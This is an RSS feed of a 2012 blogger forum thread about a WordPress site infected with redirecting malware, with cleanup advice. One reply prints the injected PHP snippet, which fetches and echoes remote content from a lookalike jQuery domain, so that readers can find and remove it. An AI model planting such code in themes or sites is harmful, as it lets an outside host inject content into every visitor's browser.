<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
	<title>Yakezie.com - Topic: HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/</link>
	<description><![CDATA[Selflessly Helping Others]]></description>
	<generator>Simple:Press Version 4.5.1</generator>
	<atom:link href="https://yakezie.com/forums/?help-desk&#038;helpppppppppp&#038;xfeed=topic" rel="self" type="application/rss+xml" />
<item>
	<title>rstrode on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p75799</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p75799</guid>
	<description><![CDATA[<p>There is a really good chance that code was located in the /lib/html/ folder within your theme, not WordPress itself, but the theme you were using. It is probably located in the header.php file within that folder. There are several header.php&#039;s in these kind of themes, which make taking it down a little bit of work, but possible. It could have also been labeled something else. However, that is apart of a header loop, they added it as a function. I have seen it done to many sites. It is usually comes already included in the theme file or added later through an update. I have found this to be the case a few times helping friends out with their sites. I was a computer programmer before I decided to be a human programmer. So, they all ask me for help when they have issues.</p>
<p>I figured I would post this just in case anyone else has this issue they have a good place to start to track it down. Make sure to only delete the function. Below is an example from a friends site.</p>
<p>if (function_exists(‘curl_init’))<br />
 {<br />
 $url = “http://www.j-query.org/jquery-1.6.3.min.js”;<br />
 $ch = curl_init();<br />
 $timeout = 5;<br />
 curl_setopt($ch,CURLOPT_URL,$url);<br />
 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);<br />
 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);<br />
 $data = curl_exec($ch);<br />
 curl_close($ch);<br />
 echo “$data”;<br />
 }<br />
 ?&#62; </p>
<p>The code you are looking for will look something like this, but may have a different link and it will fix you issue and you&#039;re site will run a lot faster. </p>
]]></description>
	<pubDate>Wed, 18 Apr 2012 13:36:14 +0000</pubDate>
</item>
<item>
	<title>This That And The MBA on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68478</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68478</guid>
	<description><![CDATA[<p>Sucuri.net removed spent about 10 hours working on it.  They found that it was in the Thesis theme and the malware had somehow gotten installed in there.  They reinstalled the theme but now it messed with the site, it removed some of the widgets and things I had.  Better than having to start all over so that is what I will be doing this weekend. They also got rid of my Sociable Icons that i had installed to like or send to twitter.  I wrote an little write up on my site yesterday about it.</p>
]]></description>
	<pubDate>Fri, 24 Feb 2012 06:16:21 +0000</pubDate>
</item>
<item>
	<title>OneCentAtatime on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68439</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68439</guid>
	<description><![CDATA[<p>What actually is the root cause? Let us all know about it</p>
]]></description>
	<pubDate>Thu, 23 Feb 2012 17:01:46 +0000</pubDate>
</item>
<item>
	<title>This That And The MBA on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68362</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68362</guid>
	<description><![CDATA[<p>yah tell me about it....nothign more frustrating than trying to do something and it is beyond your comprehension....i know finance...computer language i was lost...it looked good to me but of course i didnt know what i was looking for...needless to say it is fixed after 3 long days...i should have just done it one day one...but i being me thought id try to fix it on my own...so i could pat myself on the back...</p>
<p>but im back up!!!!! wooo hooo<img class="sfsmiley" src="/wordpress/wp-content/forum-smileys/sf-laugh.gif" alt="Laugh" /></p>
]]></description>
	<pubDate>Thu, 23 Feb 2012 09:54:39 +0000</pubDate>
</item>
<item>
	<title>Smart Wealth on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68307</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68307</guid>
	<description><![CDATA[<p>Too bad you had to pay to get the problem resolved. </p>
]]></description>
	<pubDate>Thu, 23 Feb 2012 04:44:31 +0000</pubDate>
</item>
<item>
	<title>jmichelsen on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68190</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68190</guid>
	<description><![CDATA[<p><strong>OneCentAtatime said: </strong></p>
<blockquote><p>
Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.</p>
<p> </p>
<p>MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first. </p>
<p> </p>
<p>Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect&#039; etc.</p>
<p>any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file&#039;s folder structure or documentation within.</p>
</blockquote>
<p>WordPress in general isn&#039;t the issue like OneCent said, but it&#039;s the plugins/themes that usually cause havoc, more specifically, if plugins and themes aren&#039;t kept up to date, or are coded badly, you&#039;re open to attacks. When a new release of a plugin/theme/WordPress core comes out, in the release notes, vulnerabilities that were patched are revealed which makes the old version even more susceptible.</p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 13:04:02 +0000</pubDate>
</item>
<item>
	<title>jmichelsen on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68189</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68189</guid>
	<description><![CDATA[<p>Hey Christopher, I haven&#039;t received your email but am happy to help. I just went to your site, saw your post about inmotion fixing the problem..then I got redirected to some weight-loss ad. </p>
<p>Is inmotion still working on the problem?</p>
<p>I&#039;ve sent you an email.</p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 12:58:48 +0000</pubDate>
</item>
<item>
	<title>OneCentAtatime on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68172</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68172</guid>
	<description><![CDATA[<p>Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.</p>
<p> </p>
<p>MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first. </p>
<p> </p>
<p>Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect&#039; etc.</p>
<p>any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file&#039;s folder structure or documentation within.</p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 11:46:26 +0000</pubDate>
</item>
<item>
	<title>FamilyMoneyValues on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68144</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68144</guid>
	<description><![CDATA[<p>This is a very good question.  Is Wordpress more susceptible than other products to infestations?</p>
<p><strong></strong> </p>
<p><strong>Charles @ MoneyGreenLife said: </strong></p>
<blockquote><p>
i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?</p>
</blockquote>
]]></description>
	<pubDate>Wed, 22 Feb 2012 09:40:39 +0000</pubDate>
</item>
<item>
	<title>This That And The MBA on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68131</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68131</guid>
	<description><![CDATA[<p>i just went and spent the 90 bucks for sucuri.net and they are removing it.  if i spent the past 2 nights messing with it and i couldnt figure it out, my time is worth the 90 bucks also considering it comes iwht a year of protection. ughh it is a pain to deal with and not understanding code to much it could be buried anywhere.<img class="sfsmiley" src="/wordpress/wp-content/forum-smileys/sf-frown.gif" alt="Frown" /></p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 09:03:44 +0000</pubDate>
</item>
<item>
	<title>Jeremy @ Personal Finance Whiz on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68122</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68122</guid>
	<description><![CDATA[<p>If you don&#039;t see anything amiss in the header.php, check your functions.php. </p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 08:27:06 +0000</pubDate>
</item>
<item>
	<title>Charles @ MoneyGreenLife on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68117</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68117</guid>
	<description><![CDATA[<p>i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?</p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 08:08:29 +0000</pubDate>
</item>
<item>
	<title>Jackie on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68111</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68111</guid>
	<description><![CDATA[<p>If you are using WordPress, I would look in Appearance &#62; Editor and then click header.php.  Based on what you&#039;ve described, that seems like the most likely location for the snippet to me.  Once you find it, you can remove it and click Update File at the bottom.</p>
]]></description>
	<pubDate>Wed, 22 Feb 2012 07:43:25 +0000</pubDate>
</item>
<item>
	<title>This That And The MBA on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68050</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68050</guid>
	<description><![CDATA[<p>If he is at PF Firewall I emailed him earlier. I havent heard back from him yet.</p>
<p> </p>
<p>Thanks for your suggestion.</p>
]]></description>
	<pubDate>Tue, 21 Feb 2012 19:16:48 +0000</pubDate>
</item>
<item>
	<title>Forest Parks on HELPPPPPPPPPP</title>
	<link>https://yakezie.com/forums/help-desk/helpppppppppp/#p68046</link>
	<category>Help Desk</category>
	<guid isPermaLink="true">https://yakezie.com/forums/help-desk/helpppppppppp/#p68046</guid>
	<description><![CDATA[<p>Can your host just restore from a backup 2 days ago? If not it may need a full clean up and could be in every theme file. A couple of people (I think Jesse Michelson is one) here offer services cleaning up these kinds of messes. I would offer but I don&#039;t have time today I am afraid, it&#039;s nearing the end of the day here.</p>
]]></description>
	<pubDate>Tue, 21 Feb 2012 19:11:46 +0000</pubDate>
</item>
</channel>
</rss>
<!--
Performance optimized by W3 Total Cache. Learn more: https://www.boldgrid.com/w3-total-cache/


Served from: yakezie.com @ 2026-04-20 10:07:31 by W3 Total Cache
-->